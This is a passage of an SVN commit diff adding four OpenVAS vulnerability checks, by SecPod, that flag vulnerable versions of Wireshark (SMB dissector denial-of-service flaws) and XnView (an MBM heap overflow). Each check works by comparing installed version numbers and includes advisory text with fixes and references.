+# $Id: secpod_wireshark_smb_dissector_dos_vuln_win.nasl 9679 2010-06-17 14:09:24Z jun $
+#
+# Wireshark SMB dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902196);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2283");
+  script_tag(name:"cvss_base", value:"3.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark SMB dissector Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with Wireshark and is prone to Denial of
+  Service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by a NULL pointer dereference error in the 'SMB' dissector,
+  which could be exploited to crash an affected application via unknown vectors.
+
+  Impact:
+  Successful exploitation will allow the attackers to crash an affected
+  application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8
+
+  Fix:  Upgrade to Wireshark version 1.0.14 or 1.2.9:
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  http://secunia.com/advisories/40112
+  http://www.vupen.com/english/advisories/2010/1418
+  http://www.wireshark.org/security/wnpa-sec-2010-05.html
+  http://www.wireshark.org/security/wnpa-sec-2010-06.html
+  http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+  exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+   version_in_range(version:sharkVer, test_version:"0.99.6", test_version2:"1.0.13")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl 9679 2010-06-17 14:09:24Z jun $
+#
+# Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902197);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-2285");
+  script_tag(name:"cvss_base", value:"3.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with Wireshark and is prone to Denial of
+  Service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by a NULL pointer dereference error in the 'SMB PIPE'
+  dissector, which could be exploited to crash an affected application via
+  unknown vectors.
+
+  Impact:
+  Successful exploitation will allow the attackers to crash an affected
+  application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 0.8.20 to 1.0.13 and 1.2.0 to 1.2.8
+
+  Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  http://secunia.com/advisories/40112
+  http://www.vupen.com/english/advisories/2010/1418
+  http://www.wireshark.org/security/wnpa-sec-2010-05.html
+  http://www.wireshark.org/security/wnpa-sec-2010-06.html
+  http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+  exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+   version_in_range(version:sharkVer, test_version:"0.8.20", test_version2:"1.0.13")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerabilities Test
+# $Id: secpod_xnview_mbm_bof_vuln_lin.nasl 9700 2010-06-18 16:21:45Z jun $
+#
+# XnView 'MBM' Processing Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902074);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-1932");
+  script_bugtraq_id("40852");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("XnView 'MBM' Processing Buffer Overflow Vulnerability (Linux)");
+  desc = "
+  Overview: This host has XnView installed and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerabilities Insight:
+  The flaw is due to improper bounds checking when processing 'MBM' (MultiBitMap)
+  files, which could be exploited to cause a heap overflow.
+
+  Impact:
+  Successful exploitation will allow attackers to overflow a buffer and execute
+  arbitrary code on the system with elevated privileges or cause the application
+  to crash.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  XnView versions prior to 1.97.5 on linux
+
+  Fix: Update to XnView version 1.97.5
+  For updates refer, http://www.xnview.com/
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/59421
+  http://www.vupen.com/english/advisories/2010/1468
+  http://securitytracker.com/alerts/2010/Jun/1024100.html
+  http://www.coresecurity.com/content/XnView-MBM-Processing-Heap-Overflow ";
+
+  script_description(desc);
+  script_summary("Check for the version of XnView");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_xnview_detect_lin.nasl");
+  script_require_keys("XnView/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get XnView Version from he KB
+xnviewVer = get_kb_item("XnView/Linux/Ver");
+if(xnviewVer != NULL)
+{
+  ## Check for XnView version less than 1.97.5
+  if(version_is_less(version:xnviewVer, test_version:"1.97.5")){
+   security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision

Added: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl	2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl	2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerabilities Test
+# $Id: secpod_xnview_mbm_bof_vuln_win.nasl 9700 2010-06-18 17:11:45Z jun $
+#
+# XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902075);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2010-1932");
+  script_bugtraq_id("40852");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows)");
+  desc = "
+  Overview: This host has XnView installed and is prone to buffer overflow
+  vulnerability.
+
+  Vulnerabilities Insight:
+  The flaw is due to improper bounds checking when processing 'MBM' (MultiBitMap)
+  files, which could be exploited to cause a heap overflow.
+
+  Impact:
+  Successful exploitation will allow attackers to overflow a buffer and execute
+  arbitrary code on the system with elevated privileges or cause the application
+  to crash.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  XnView versions prior to 1.97.5 on windows
+
+  Fix: Update to XnView version 1.97.5
+  For updates refer, http://www.xnview.com/
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/59421
+  http://www.vupen.com/english/advisories/2010/1468
+  http://securitytracker.com/alerts/2010/Jun/1024100.html
+  http://www.coresecurity.com/content/XnView-MBM-Processing-Heap-Overflow ";
+
+  script_description(desc);
+  script_summary("Check for the version of XnView");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2010 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_xnview_detect_win.nasl");
+  script_require_keys("XnView/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get XnView from KB
+xnviewVer = get_kb_item("XnView/Win/Ver");
+if(xnviewVer != NULL)
+{
+  ## Check for XnView version less than 1.97.5
+  if(version_is_less(version:xnviewVer, test_version:"1.97.5")){
+   security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision